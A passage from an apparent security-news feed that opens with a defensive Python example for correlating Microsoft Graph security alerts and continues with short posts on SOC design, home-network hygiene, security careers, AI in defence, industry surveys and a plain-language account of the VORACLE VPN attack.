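Added example, not Microsoft's code. Assumes the Microsoft Graph Security API
v1.0 `alert` resource shape; all alert data below is constructed.
"""
from datetime import datetime, timedelta, timezone
from urllib.parse import urlencode

GRAPH_ALERTS_URL = "https://graph.microsoft.com/v1.0/security/alerts"


def build_alerts_query(severities=("medium", "high"), since=None, top=50):
    """Build the GET URL a SOC would call (with a bearer token) to pull recent
    alerts. Only the URL is constructed here; nothing is sent."""
    sev = " or ".join(f"severity eq '{s}'" for s in severities)
    flt = f"({sev})"
    if since is not None:
        flt += " and createdDateTime ge " + since.strftime("%Y-%m-%dT%H:%M:%SZ")
    return GRAPH_ALERTS_URL + "?" + urlencode({"$filter": flt, "$top": top})


# Constructed sample alerts (not real data), shaped like Graph alert objects.
SAMPLE_ALERTS = [
    {"id": "alert-ep-001", "title": "Suspicious PowerShell execution", "severity": "high",
     "eventDateTime": "2018-10-15T09:12:00Z",
     "vendorInformation": {"provider": "Windows Defender ATP", "vendor": "Microsoft"},
     "hostStates": [{"fqdn": "laptop-17.corp.example"}],
     "userStates": [{"userPrincipalName": "alice@corp.example"}]},
    {"id": "alert-mail-002", "title": "Phishing email delivered", "severity": "medium",
     "eventDateTime": "2018-10-15T08:55:00Z",
     "vendorInformation": {"provider": "Office 365 ATP", "vendor": "Microsoft"},
     "hostStates": [],
     "userStates": [{"userPrincipalName": "alice@corp.example"}]},
    {"id": "alert-ep-003", "title": "Unsigned driver loaded", "severity": "medium",
     "eventDateTime": "2018-10-15T11:40:00Z",
     "vendorInformation": {"provider": "Windows Defender ATP", "vendor": "Microsoft"},
     "hostStates": [{"fqdn": "laptop-22.corp.example"}],
     "userStates": [{"userPrincipalName": "bob@corp.example"}]},
    {"id": "alert-mail-004", "title": "Phishing email delivered", "severity": "medium",
     "eventDateTime": "2018-10-13T14:02:00Z",
     "vendorInformation": {"provider": "Office 365 ATP", "vendor": "Microsoft"},
     "hostStates": [],
     "userStates": [{"userPrincipalName": "carol@corp.example"}]},
    {"id": "alert-asc-005", "title": "Outbound connection to rare IP", "severity": "medium",
     "eventDateTime": "2018-10-15T16:30:00Z",
     "vendorInformation": {"provider": "Azure Security Center", "vendor": "Microsoft"},
     "hostStates": [{"fqdn": "LAPTOP-22.corp.example"}],
     "userStates": []},
]


def _parse_ts(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def _entities(alert):
    """Hosts and users named by an alert, lower-cased so they match across providers."""
    ents = set()
    for host in alert.get("hostStates") or []:
        if host.get("fqdn"):
            ents.add(("host", host["fqdn"].lower()))
    for user in alert.get("userStates") or []:
        if user.get("userPrincipalName"):
            ents.add(("user", user["userPrincipalName"].lower()))
    return ents


def correlate(alerts, window_minutes=60):
    """For every alert, list alerts from a *different* provider that share a host
    or user and fall within the window. Same-provider matches are skipped: they
    add no cross-system evidence, which is the whole point of the exercise."""
    window = timedelta(minutes=window_minutes)
    index = {a["id"]: (_parse_ts(a["eventDateTime"]), _entities(a),
                       a["vendorInformation"]["provider"]) for a in alerts}
    related = {}
    for seed_id, (t0, e0, p0) in index.items():
        hits = [other_id for other_id, (t1, e1, p1) in index.items()
                if other_id != seed_id and p1 != p0
                and e0 & e1 and abs(t1 - t0) <= window]
        related[seed_id] = sorted(hits)
    return related


def needs_investigation(alerts, window_minutes=60):
    """Alert ids that have corroborating evidence from another gravity well."""
    return sorted(i for i, hits in correlate(alerts, window_minutes).items() if hits)


if __name__ == "__main__":
    print(build_alerts_query(since=datetime(2018, 10, 15, tzinfo=timezone.utc)))
    for seed, hits in correlate(SAMPLE_ALERTS).items():
        print(seed, "->", hits)
    print("investigate:", needs_investigation(SAMPLE_ALERTS))
```

With the default one-hour window, only the endpoint alert for Alice and the phishing alert delivered to her 17 minutes earlier corroborate each other; Bob's endpoint alert and the later Azure Security Center alert on the same host fall outside the window and only pair up if the window is widened. The window and the choice of join keys (user, host) are the tuning knobs an analyst adjusts instead of writing SIEM rules.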

To make the SOC of tomorrow a reality, the question you ask your security vendors needs to change. Instead of asking "Can you send all your logs into my SIEM?" ask these questions:

  • How do you orchestrate events across your own platform?
  • Do you provide APIs for me to query in real-time?
  • How do you integrate with other vendors?
  • What partnerships, orchestration, and automation capabilities do you have?

The SOC of tomorrow must look across multiple data sources, gravity wells, and hybrid clouds to provide a complete look at a company’s security posture. Look for vendors that understand this new architectural approach and are building cloud-aware solutions for tomorrow, not ones that are locked into an on-premises-centric past.

The post Making it real—harnessing data gravity to build the next gen SOC appeared first on Microsoft Secure.



Microsoft Secure

A week in security (October 8 – 14)

Last week, we warned you away from some dubious Doctor Who streams, explained how Endpoint Detection and Response may not be enough, and explored what happens during a confusing supply chain story. We also showed you how to keep up with security, explained the risks of fake browser updates, and explored the unpleasant world of workplace violence.

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (October 8 – 14) appeared first on Malwarebytes Labs.

Google to Encrypt Android Cloud Backups With Your Lock Screen Password

In an effort to secure users' data while maintaining privacy, Google has announced a new security measure for Android Backup Service that now encrypts all your backup data stored on its cloud servers in a way that even the company can't read it. Google allows Android users to automatically backup their essential app data and settings to their Google account, allowing them to simply restore it

The future of OT security in modern industrial operations

Both the likelihood and consequences of cyberattacks to OT/ICS components continue to grow for modern industrial operations. In this podcast, Andrew Ginter, VP of Industrial Security at Waterfall Security Solutions, and Edward Amoroso, CEO of TAG Cyber, talk about how new approaches are needed to gain defensive advantage over already-capable cyber adversaries, to keep up with new OT/ICS technologies, and to serve business risk management needs in increasingly-demanding, competitive environments. Here’s a transcript of the … More

The post The future of OT security in modern industrial operations appeared first on Help Net Security.

Scaling the IoT product security lifecycle with automation

Recent events around the globe once again shine a limelight on the security issues the IoT community is facing. From claimed attacks on chlorine plants in Ukraine to potential threats to entire medical systems, IoT devices have left their users at a disadvantage against attackers, and the reason might just be that the security minds of our generation are still approaching product security in a traditional way – manually. The IoT security value chain continues … More

The post Scaling the IoT product security lifecycle with automation appeared first on Help Net Security.

Stringent password rules lower risk of personal data breaches

The all-too-common practice of using the same email address/password combination to log into multiple websites can be damaging, especially for employers with many users and valuable assets protected by passwords, like universities. “If someone uses their university email address and passphrase to sign up for, say, LinkedIn, and LinkedIn is breached by cybercriminals, that would mean their university password is sitting on the web for everyone to see,” said Indiana University’s Dan Calarco, co-author on … More

The post Stringent password rules lower risk of personal data breaches appeared first on Help Net Security.

Kaspersky Lab official blog: 5 tips to protect your home network

For the second year in a row, Kaspersky Lab has signed on as an official Champion of National Cyber Security Awareness Month (NCSAM). Over the course of the month, we will be focusing on security topics that can be used by both businesses and consumers alike. For the first week, we will focus on securing your home.

So, let’s get started. Do you:

  1. Have Wi-Fi in your house?
  2. Have at least one device connected to the Internet?
  3. Ever have friends or family over?

Now, the big one:

  4. Are you sure everything is secure?

Go ahead and answer — no one is watching (or are they? We’ll come back to that a bit further down). By the end of this post, you will have a more sound answer for No. 4 than you probably do now.

1. Secure your computer

Perhaps the simplest place to start with home security is to secure your actual devices. Computers, tablets, and phones are all susceptible to malicious infections from the Internet or from apps that are more than meets the eye — or that are free, but with a catch.

To protect your devices, the best advice is to install a good antivirus solution. There’s no shortage of capable products reviewed by trusted, independent professionals. They range greatly in price, and you can even get some free. I recommend our Kaspersky Security Cloud product because it offers the most advanced protection and covers multiple devices including PC, Mac, Android, and even iOS devices.

On top of a good antivirus program, it is also a good rule of thumb to download apps only from official sources — Google Play, Apple’s App Store, or the app’s site. Doing otherwise, you risk ending up with a somewhat modified version of the app you were looking for, with extra features like filling your screen with ads, spying on you, mining cryptocurrencies at your expense, or even stealing your bank account login.

2. Secure your Wi-Fi

When you had Internet connectivity added to your home, your provider probably installed its own combination modem/router, named your home network, and set up a password for you. If you didn’t change that name and set a new password afterwards, now’s the time. The main reason is that you are paying for the service, why let someone take it from you?

Most routers have a default username and password like admin/admin or admin/password. A simple Google search for your router model will yield those default credentials. Anyone who knows them can log in, rename the network, set a new password, and reconfigure any other available options. Or, you can. Do that now. While you're in there, be sure to update the router's firmware.

You should also set up a guest network for friends and family who visit your home. I named mine “FBI Van” just to mess with people — I won’t mention the name of the main Wi-Fi here — and, obviously, gave it a different password.

3. Secure smart devices / Internet of Things

Now, if you are connecting IoT devices to your network, I would suggest hooking them up to your guest network rather than the main one, and also changing their default passwords. You may be wondering why you should change the password.

The answer lies in the same issue as the router defaults mentioned earlier. Most IoT devices have a default password that is just a Google search away. Go ahead and check it out for yourself, and then work on changing yours.

A reason this issue causes concern is that many criminals have infected these devices and are adding them to botnets at an alarming rate.

4. Blindfold Big Brother

Earlier, we asked if anyone was watching you. In some ways, it was a small joke, but it really is sensible to be cautious when it comes to your computer’s webcam. Many apps and websites ask for access to your camera and microphone. What are they doing with it? Well, you never know for sure, but there is a chance that someone, somewhere in the world is actually watching you.

How can you avoid this? You can throw a piece of tape over the camera or buy a webcam protector that you open only when you want to use your camera. Good antivirus programs also offer the ability to restrict access to cameras — a feature I highly recommend.

5. Keep out USB threats

One other threat needs to be mentioned, something that affects not only businesses, but also everyday people like you or me.

Have you ever found a USB stick in a parking lot, park, office lobby, or somewhere else? If I shook my Magic 8-Ball, I think it would say signs point to yes. With the amount of trade-show swag and giveaways we all encounter, these devices are basically a dime a dozen, so dropping one won’t cause too much angst.

Now, if you find one, should you plug it into your computer and see what surprises lie within? The answer is just two letters long: No! You see, not only will curiosity probably kill the cat, but it can also bring malware or a hidden cryptocurrency miner onto your device. Don’t believe me? Look no farther back than 2010, when the Stuxnet virus infected the network of an Iranian nuclear facility through a good old USB stick.

Fast-forward to 2018 and recent research from Kaspersky Lab shows that USB sticks and other removable media are still very popular among cybercriminals as a means of infection.

I hope these tips help you and bring you a few steps closer to a secure home network. I would also suggest reading up on the tips we offer on Kaspersky Daily to further boost your levels of security.



Kaspersky Lab official blog

Every month should be Cyber Security Awareness Month

In 2004, October was deemed National Cyber Security Awareness Month (NCSAM). This was an initiative promoted by the National Cyber Security Division (NCSD) within the Department of Homeland Security and the National Cyber Security Alliance (NCSA, a non-profit organization). It’s been 14 years since its inception, has it worked? Are we more aware of the perils in the world of cyber security? The reality is that there are various studies that have been conducted over … More

The post Every month should be Cyber Security Awareness Month appeared first on Help Net Security.

Securing campus networks became more challenging

The results of a global Infoblox survey on the state of network security at higher education institutions reveals that 81 percent of IT professionals believe securing campus networks has become more challenging in the last two years. The report titled “Defending Networks at Higher Learning Institutions – Heroes Needed” surveyed over 600 students, IT professionals and staff from higher education institutions in the U.S., U.K. and Germany, and found that networks at higher education institutions … More

The post Securing campus networks became more challenging appeared first on Help Net Security.

Identity spoofing is the most prevalent attack vector for the gaming and gambling industry

A new ThreatMetrix Cybercrime Report revealed that identity spoofing, fuelled by stolen identity data, is the most prevalent attack vector for the gaming and gambling industry. It also pinpointed a marked growth in location (IP) spoofing attacks. In the second quarter, location spoofing became the fastest growing attack vector in the space, increasing 257% year-on-year. This is due to the availability of more sophisticated location spoofing tools, which fraudsters use to attempt to disguise their … More

The post Identity spoofing is the most prevalent attack vector for the gaming and gambling industry appeared first on Help Net Security.

6 ways to keep up with cybersecurity without going crazy

As we dive headfirst into National Cybersecurity Awareness Month, it seems only fitting to discuss ways to stay on top of developments in modern cybersecurity and privacy. What’s the best way to stay protected? How can you determine if something is a scam? Which big company has been breached now?

The topic of security features heavily across many industries, blogs, and news channels simply because of the current state of affairs. It seems like every day we hear about a new major data breach, affecting thousands—if not millions—of people. From retailers like Target to social media sites such as Facebook to more prominent credit agencies like Equifax—no one is safe.

The uncontrolled nature of attacks coupled with the 24/7 news cycle make it downright overwhelming to keep up with all the cybersecurity information lobbed at us. The widespread release of new attacks, data breaches, systems failures, and malware use have led many to a feeling of security fatigue. We’re essentially all at a point where we’re sick and tired of hearing about it, and frankly disappointed in many companies and individuals who continually fail to protect the data they are responsible for.

Fatigue or not, we shouldn’t collectively ignore what’s happening in the world of cybersecurity right now. We all have a duty to not only protect ourselves, but also our communities, countries, and world over by staying in the know. You can contribute by keeping your knowledge up-to-date and employing a few simple strategies to capture the good information out there and weed out the bad.

1. Follow security professionals and influencers

We live in the information age, where knowledge is digital, recorded and streamed for posterity, stored in giant servers, and available at the entry of a search term. You can acquire new information and expand your knowledge in a variety of ways, according to your preferred methods.

For example, you can glean information from more traditional sources such as news websites and blogs from security experts, but you can also turn to social media, attend webinars and conferences, or communicate directly with someone well-versed in the field.

You could even bring it up at the office water cooler or by making small talk with parents at your child's school—cybersecurity is covered so much in the media now that it's become fodder for mainstream chatter. Many will happily discuss more than just the latest breach, possibly drawing up a debate on which security solution is the best or offering up ways in which you can protect yourself from attack.

Whatever you choose, you’ll want to follow some of the top security professionals for the best guidance. Some of my favorites include:

2. Browse security-related social media topics

Most social media networks are great resources for digging up additional content, such as news stories (real ones), videos, opinions, and other posts. In addition, they’re home to a treasure trove of supplemental information on local, national, and global events, career opportunities, top cybersecurity businesses, and more. Of course, social media is not the only place you’ll want to acquire information from, but it can serve as a complement to some of the other channels on this list.

Twitter is especially useful if you know which trends and hashtags to search, as well as who to follow. It allows you to see discussions about current events in real time so you can be right there, in the moment, when things play out.

Twitter lists are also great for creating a niche content feed. You can specify which security vendors, influencers, and developers you’d like to be in your list (or lists), and filter Tweets accordingly. Lists have the added benefit of weeding out noise not pertinent to a particular group—you can focus on a single topic or community.

3. Attend live events

Believe it or not, there’s a huge market for live, in-person cybersecurity events. This includes so much more than conferences, or “cons.” You might also attend lectures, discussions, workshops, networking events, educational courses, or sponsored meet ups.

Web-based events present another great avenue, such as webinars and online community conference calls. Some of the best live cybersecurity speakers will attend such events or be asked to participate, and it stands to reason you can learn a lot from any one of them.

So how do you find such events? You have to keep a pulse on when, where, and what’s happening around you. Local newspapers are great resources for event listings. And of course, there’s always trusty-old Google. Luckily, some of the other channels mentioned in this article will also help keep you informed.

4. Check vulnerability and risk advisory feeds

One cannot overstate the need to remain aware of security vulnerabilities discovered in both new and old technologies—especially for business owners. Web browsers, apps, software, operating systems, and a variety of the personal or professional tools you use may have been compromised or attacked.

You should make a habit of checking vulnerability alert feeds and advisory sites to ensure the protection of your personal and corporate data. Here’s a quick list:

If regularly checking these feeds feels overwhelming, another approach would be to simply keep your programs updated at all times so there’s no chance a cybercriminal can exploit the vulnerability and gain access to your machine.

5. Listen to a podcast

We all lead busy lives—maybe you don’t have time to read article after article. But what about the time you spend driving, walking, or traveling? Podcasts fill this time nicely, as you can listen to them on-the-go and multi-task while doing so.

Podcasts can be found—and listened to—through a variety of channels, including media apps, music libraries such as iTunes or Spotify, Amazon, or even YouTube.

6. Customize your own real-time alerts

Using a tool such as IFTTT—which stands for If This Then That—you can set up customized alerts for all things cybersecurity.

The subreddit r/netsec, for example, is one of the most popular curated forums for cybersecurity news and information. You can configure IFTTT so it sends you push notifications or emails when something gains popularity on the subreddit. The headlines will populate in the taskbar of your mobile device allowing you to gauge whether or not the story is worth your time.

The r/netsec example is just one of many, of course. You can configure any trusted sites or community forums to send you alerts via RSS feed as you see fit.

Just keep consuming

If you want to stay as close to the bleeding edge of cybersecurity as you can, continue to consume content, whether that’s by reading, listening, talking, watching videos, or attending live events. Understand that as you learn, the industry will continue to evolve, so staying on top of cybersecurity developments means adapting to an ever-shifting landscape. It’s unfortunately not enough anymore to glance at one article and call it a day.

While you understandably won’t have the time or inclination to invest every waking hour in your cybersecurity pursuits, you can certainly remain in-the-know without losing your mind by carefully curating and streamlining online information, and turning to sources you trust. There are plenty of ways to make yourself crazy. Learning more about cybersecurity shouldn’t be one of them.

The post 6 ways to keep up with cybersecurity without going crazy appeared first on Malwarebytes Labs.

Radware Blog: Disaster Recovery: Data Center or Host Infrastructure Reroute

Companies, even large ones, haven't considered disaster recovery plans outside of their primary cloud provider's own infrastructure as regularly as they should. In March of this year, Amazon Web Services (AWS) had a massive failure which directly impacted some of the world's largest brands, taking them offline for several hours. In this case, it was […]

The post Disaster Recovery: Data Center or Host Infrastructure Reroute appeared first on Radware Blog.



Radware Blog

The Many Paths To A Cybersecurity Education

Ask a room full of cybersecurity professionals about their educational background and how they got started on their career path and you’re going to get a myriad of different answers.

From one perspective, that’s frustrating. It’s hard to confidently recommend a path for people starting out when almost any path can end up at your desired destination: a long, sustainable career in cybersecurity.

The good news? Cybersecurity is a career path where your hard work and efforts will have a dramatic effect on your success. The lack of a degree, certification, or other credential won’t necessarily hold you back…but they definitely can help you.

Mindset

Before we dive into specific education options, let’s look at the type of thinking and personality that leads to a successful cybersecurity professional, regardless of the cybersecurity role.

If you are:

● Excited about learning constantly
● Eager to seek out different points of view
● Persistent and doggedly determined

Then a career in cybersecurity will probably be a great fit. I can’t stress enough how important this mindset is. The technology aspects will come and go at a rapid pace. These areas can be learned and will need to be re-learned time and time again.

These personality traits will help ensure that you’re not only successful but have a fulfilling career in the field. Cybersecurity presents a unique challenge in that it covers all aspects of technology. There’s a near endless opportunity to learn and apply that learning to drive real-world outcomes.

But if you’re not excited about the constant learning required to deal with an ever-changing landscape, not eager to evaluate multiple viewpoints, and you give up when the going gets tough, cybersecurity is not a good fit.

If you’re still reading, then let’s move on to the more direct aspects of getting ready for a career in cybersecurity: education.

Undergraduate Degree

Over the past few years, a number of cybersecurity-focused undergraduate programs have been rolled out around the world. The challenge here is availability.

Cybersecurity-focused programs are not yet widely available. That limits this option for most people. However, an undergraduate degree in computer science, computer engineering, math, finance, or business will all serve you well. Basically any degree that helps you better understand how technology works, how technology is used, or how business runs is going to help…significantly.

Certifications

While their value is often debated, certifications can provide a huge boost to the start of your cybersecurity career. The number one pushback against certifications is that they usually are not hands-on.

Hands-on experience is absolutely critical, but third party validation of your knowledge is probably more important early in your career. Certifications from reputable organizations can help give you a leg up and make that first step on your career path a little bit easier.

Your first certification(s) should focus on broad cybersecurity topics. Avoid technology-specific certifications at first. This will keep your options open instead of tying yourself to a specific technology.

Experience

The most valuable – and most difficult – type of education is hands-on experience. You typically have to get in the door somewhere…anywhere… before you can start to get hands-on experience.

There are other ways to demonstrate that you can apply what you’ve learned. Here are a few ideas to help get you started:

● Review some code or an architecture for an open source project. Write up the results and share them
● Analyze a cybersecurity headline and provide a risk assessment on the related technologies/services
● Attend a local meetup where they are hosting an activity or a local (or online) CTF

All of these options are free, give you a chance to apply some of your knowledge, and are perfect for sharing with others in the community.

No Wrong Path

The only wrong step on the path toward a career in cybersecurity is not taking that first step.

Cybersecurity is an exciting career choice that contains a multitude of roles covering almost everything you can imagine. If you enjoy tackling complex problems from a number of different angles, it’s hard to ask for a more compelling career choice. The fact that it’s one of the hottest areas in tech is just icing on the cake!

What is your inspiration for pursuing a career in cybersecurity? What steps have you taken towards that goal? Let me know in the comments below or on Twitter, where I’m @marknca.

The post The Many Paths To A Cybersecurity Education appeared first on .

Cybersecurity Future Trends: Why More Bots Means More Jobs

As the technological world hurls into the 2020s and cybersecurity future trends become reality, many experts expect the industry to evolve rapidly. Among the paradigm shifts still to come from digital innovation, data protection is bound to change and expand beyond the capabilities of today’s most common tools.

Above all, expect artificial intelligence (AI) to take a bigger role in cybersecurity as the IT industry seeks more efficient ways to shut down attacks immediately — or even before they happen.

Hiring AI Cybersecurity Guards

In the near future, new AI-powered solutions will look for anomalies in enterprise systems while matching patterns in threat actor behavior to predict when attacks are coming, said Shashi Kiran, chief marketing officer at Quali, a vendor of cloud automation services. Companies will also use AI tools to analyze user behavior and dig through system logs to spot problems, noted Laura Lee, executive vice president of rapid prototyping at cybersecurity training vendor Circadence. Lee said she expects AI-powered cybersecurity training to become more common as well.

In addition, AI systems will soon be able to analyze data from multiple sources, provide virtual assistants with special knowledge in cybersecurity and assist with penetration testing. In the coming decades, the “full scope of AI will be brought to bear in cybersecurity training environments to provide intelligent advisers, feedback and an AI adversary to practice against,” Lee added.

Planning for Obsolescence

Newer AI systems should provide capabilities that traditional antivirus products can’t. Many current security products focus largely on signature-based detection or analytics from patterns of suspicious activity, said Jason Rebholz, senior director of strategic partnerships at cybersecurity vendor Gigamon.

“With the emergence of AI, the basic decision-making can be offloaded to software,” he added. “While this isn’t a replacement for the analyst, it provides more time for them to perform more advanced decision-making and analysis, which is not easily replaced with AI.”

An AI-Driven Coding Evolution

Some security experts see big things for AI, with a sort of evolution built into its abilities.

“Imagine a world where cyberdefenses adapt and evolve with no human intervention,” said Kathie Miley, chief operating officer (COO) at Cybrary, another cybersecurity training company. “By putting AI into practice with evolutionary algorithms, software will also be able to assess current state, improve upon itself or kill off components no longer ideal for survival.”

Miley offered the example of a developer who accidentally creates a program with a structured query language (SQL) injection vulnerability: “AI will catch it and correct it with no human involvement, because it knows [the vulnerability is] dangerous to the application’s survival.”

Unfortunately, AI-trained systems won’t be exclusive to defenders. As Miley noted, threat actors “will be able to use AI to evolve their attacks without lifting a finger. It’s a race to who is stronger — the good guys or the bad guys.”

Why Cybersecurity Future Trends Won’t Exclude Humans

But even as AI takes a more central role in many organizations’ cybersecurity efforts, the need for qualified cybersecurity professionals will not diminish.

“Until AI evolves and wipes out humans, there will always be a place for people in the cybersecurity field,” Miley said. “Regulations, compliance, ethics and needs will need to be determined by us carbon life forms. However, tasks such as monitoring attacks and coding errors — and even coding itself — will certainly be automated at some point in the near future.”

Miley added that she sees a strong demand for security architects and governance, risk and compliance professionals in the coming years.

How AI Will Help Bridge the Skills Gap

New ways of automating some cybersecurity functions will help the industry bridge the cybersecurity skills gap that’s been growing since 2014. A recent Cybersecurity Ventures report forecast a shortage of 3.5 million open cybersecurity positions by 2021.

Bret Fund, founder and CEO of cybersecurity training academy SecureSet, argued that automated tools will require more refined skill sets.

“We will still have an education problem that will be exacerbated by the new skills required to interpret and analyze AI,” he predicted.

In addition, many small and medium-sized businesses will adopt AI tools more slowly than large enterprises will, meaning plenty of cybersecurity jobs will be available, Fund added.

Cybersecurity Workers: Seize the Day

Lee noted that demand is growing for cybersecurity workers with data science expertise as organizations look to maximize the value of the data they collect. She said she also foresees a shift in cybersecurity jobs that will “place soft skills and strategy at equal importance as required technical skills.”

Cybersecurity analysts, penetration testers and incident response professionals will be popular with job recruiters for several years, she added. However, those jobs may be changing, with more workers “expected to carry competencies in strategic thinking, creativity, problem-solving, working in teams and reporting alongside business objectives.”

Augmenting Automation With a Human Touch

According to Cesar Cerrudo, chief technology officer (CTO) of cybersecurity and penetration testing vendor IOActive Labs, paint-by-the-numbers cybersecurity jobs will soon be a thing of the past.

“Jobs that consist of repetitive tasks and tasks that don’t require creativity will disappear,” he said. “Having broad knowledge on past, latest and upcoming threats, along with broad vision in cybersecurity, will be required to achieve better results. You can’t properly secure a technology without anticipating what it will look like tomorrow or in the next year.”

As technologies and their security measures carry us into 2020, forecasting threat trends will be the name of the game. Machine learning won’t replace the cybersecurity workforce any time soon, but get ready for a new face (or lack thereof) on your security operations center (SOC). Developing a broader skill set now and keeping an open mind will help you best prepare for the security industry of the future.

The post Cybersecurity Future Trends: Why More Bots Means More Jobs appeared first on Security Intelligence.

Your backup data sets can become a treasure trove for advanced threat detection

Despite ever increasing investments in security technologies, data breaches and cyber incidents are increasing at a relentless rate, and the problem is projected to keep getting worse. Industry research shows that attacks from ransomware, data compromise, malicious email and credential theft more than doubled to 160,000 incidents per year, with unreported incidents likely bringing the true number to more than 350,000. While much of the press focused on breaches to high profile targets, every size … More

The post Your backup data sets can become a treasure trove for advanced threat detection appeared first on Help Net Security.

Most Fortune 50 companies unprepared for major DNS attack

ThousandEyes has found that 68 percent of the top 50 companies on the Global Fortune 500 rankings are not adequately prepared for the next major attack on the DNS. Additionally, researchers found similar vulnerability among 44 percent of the top 25 SaaS providers, as well as 72% of the FTSE 100 companies. “Because Digital Experience is so central to a brand’s success these days, it’s critical that businesses understand that not all DNS infrastructures are … More

The post Most Fortune 50 companies unprepared for major DNS attack appeared first on Help Net Security.

Hunton Insurance Head Comments on Hotel Data Breach Coverage Dispute

As reported on the Insurance Recovery Blog, Hunton Andrews Kurth insurance practice head Walter Andrews recently commented to the Global Data Review regarding the infirmities underlying an Orlando, Florida federal district court’s ruling that an insurer does not have to defend its insured for damage caused by a third-party data breach.

The decision in St. Paul Fire & Marine Ins. Co. v. Rosen Millennium Inc., which involved a claim for coverage under two general liability insurance policies, turned on whether or not customers’ credit card information obtained from the insured’s payment system had been “made known,” and by whom. According to the district court, the insurance policies required that the credit card information be “made known” by the insured, but in this instance the publication was made by the third-party hackers. As Andrews explained, however, although it was undisputed that Florida law controlled interpretation of Millennium’s policies, the district court based its decision on a prior decision decided under South Carolina law, which differs from Florida law in many fundamental respects. “Florida state law makes it very clear that coverage is meant to be construed in favor of the policyholder where there is ambiguity,” Andrews said. “To me, it’s clear that there were two reasonable interpretations of the insurance policy here.”

Despite the outcome, Andrews noted that there are helpful takeaways from this decision for policyholders and prospective insureds facing potential exposure from cyber events: “Given how strenuously the insurers are fighting to deny coverage for data breach claims, a readable takeaway is that policyholders should consider getting very specific cyber insurance coverage.”

View the district court’s decision, and Andrews’ comments to the Global Data Review.

Radware Blog: Protecting Sensitive Data: A Black Swan Never Truly Sits Still

The black swan – a rare and unpredictable event notorious for its ability to completely change the tides of a situation. For cybersecurity, these nightmares can take the form of disabled critical services such as municipal electrical grids and other connected infrastructure networks, data breaches, application failures, and DDoS attacks. They can range from the […]

The post Protecting Sensitive Data: A Black Swan Never Truly Sits Still appeared first on Radware Blog.


Security Vulnerabilities in US Weapons Systems

The US Government Accounting Office just published a new report: "Weapons Systems Cyber Security: DOD Just Beginning to Grapple with Scale of Vulnerabilities" (summary here). The upshot won't be a surprise to any of my regular readers: they're vulnerable.

From the summary:

Automation and connectivity are fundamental enablers of DOD's modern military capabilities. However, they make weapon systems more vulnerable to cyber attacks. Although GAO and others have warned of cyber risks for decades, until recently, DOD did not prioritize weapon systems cybersecurity. Finally, DOD is still determining how best to address weapon systems cybersecurity.

In operational testing, DOD routinely found mission-critical cyber vulnerabilities in systems that were under development, yet program officials GAO met with believed their systems were secure and discounted some test results as unrealistic. Using relatively simple tools and techniques, testers were able to take control of systems and largely operate undetected, due in part to basic issues such as poor password management and unencrypted communications. In addition, vulnerabilities that DOD is aware of likely represent a fraction of total vulnerabilities due to testing limitations. For example, not all programs have been tested and tests do not reflect the full range of threats.

It is definitely easier, and cheaper, to ignore the problem or pretend it isn't a big deal. But that's probably a mistake in the long run.

IIS attacks surge from 2,000 to 1.7 million over last quarter

IIS, Drupal, and Oracle WebLogic web technologies experienced increased attacks in Q2 2018. According to a new threat report from eSentire, IIS attacks showed a massive increase, from 2,000 to 1.7 million, since last quarter. (Figure: exploit campaigns observed April 1 – July 1, 2018.) Analysis of the attacks revealed that both IIS and WebLogic exploits maintained a consistent number of attacks (about 200) per IP across organizations, with those attacks originating from servers hosting Apache, … More

The post IIS attacks surge from 2,000 to 1.7 million over last quarter appeared first on Help Net Security.

Growing intrusion trends: A perspective on today’s most sophisticated cyberattacks

According to a new CrowdStrike report, the technology, professional services, and hospitality sectors were targeted most often by cyber adversaries. The actors used a variety of novel tactics, demonstrating particular creativity and perseverance in defense-evasion and credential-access TTPs, such as the use of the Windows Internals tool Active Directory Explorer for one-time credential dumping. Notable percentages of intrusion cases by vertical include:

  • Technology: 36%
  • Professional Services: 17%
  • Hospitality: 8%
  • Defense and Federal: 7%
  • Non-governmental Organizations: 7%

… More

The post Growing intrusion trends: A perspective on today’s most sophisticated cyberattacks appeared first on Help Net Security.

Cryptomining dethrones ransomware as top threat in 2018

Based on trends in the first half of 2018, Webroot found that cybercriminals are shifting to increasingly sophisticated and targeted means of attack while also expanding their money-making endeavors, as shown by the uptick in cryptojacking and cryptomining. The current threat landscape: there has been a massive shift from ransomware to cryptomining. Malware in general, including ransomware and cryptomining, accounted for 52 percent of threats in the first half of 2018. Nonconsensual cryptomining (known … More

The post Cryptomining dethrones ransomware as top threat in 2018 appeared first on Help Net Security.

Privileged account practices are poor, and IT security teams know it

One Identity released new global research that uncovers a widespread inability to implement basic best practices across identity and access management (IAM) and privileged access management (PAM) security disciplines, likely exposing organizations to data breaches and other significant security risks. Among the survey’s most surprising findings are that nearly one-third of organizations are using manual methods or spreadsheets to manage privileged account credentials, and one in 20 IT security professionals admit they have no way … More

The post Privileged account practices are poor, and IT security teams know it appeared first on Help Net Security.

Most consumers don’t trust companies to keep personal information secure

High-profile security breaches and changing regulations have raised consumer concerns and pressured businesses, establishing 2018 as a landmark year in the data economy. Original research from Oxford Economics highlights several challenges faced by businesses as they adjust to changing regulations and consumer uncertainty, including a resounding lack of trust — just 8% of consumers strongly agree that they trust businesses to keep their personal information safe. The research also shows roughly 80% of businesses have … More

The post Most consumers don’t trust companies to keep personal information secure appeared first on Help Net Security.

The VORACLE OpenVPN Attack: What You Need to Know

Many of us know that using a VPN (Virtual Private Network) adds an extra layer of security to our Wi-Fi networks. But VORACLE, a recently discovered vulnerability that was announced at a security conference by security researcher Ahamed Nafeez, is making some people reconsider this steadfast safety tip. Let’s look under the hood at this vulnerability to understand what was impacted and why, and what we should do in the future when it comes to safely connecting to Wi-Fi.

Under the Hood of a VPN

A VPN is a connection between a secure server and your mobile device or computer. Through the VPN your activity and information on the internet is encrypted, making it difficult for anyone else to see your private information. Many of us use a VPN for work when we travel, some of us use them to watch videos online, and more and more of us use them as a best practice to help keep our information safe any time we want to use a Wi-Fi connection that we’re not sure about.

About the VORACLE VPN Vulnerability

At a high level, VORACLE leverages a vulnerability found in the open-source OpenVPN protocol. OpenVPN is an open-source protocol used by the majority of VPN providers, meaning many VPN products are affected.

The VORACLE attack can recover HTTP traffic sent via encrypted VPN connections under certain conditions, the first being that the VPN app in use enables compression via the OpenVPN protocol. A hacker must be on the same network and able to lure you to an HTTP (not HTTPS) site with malicious code through phishing or a similar tactic. The attack can happen on all web browsers but Google Chrome, due to the way in which HTTP requests are made.
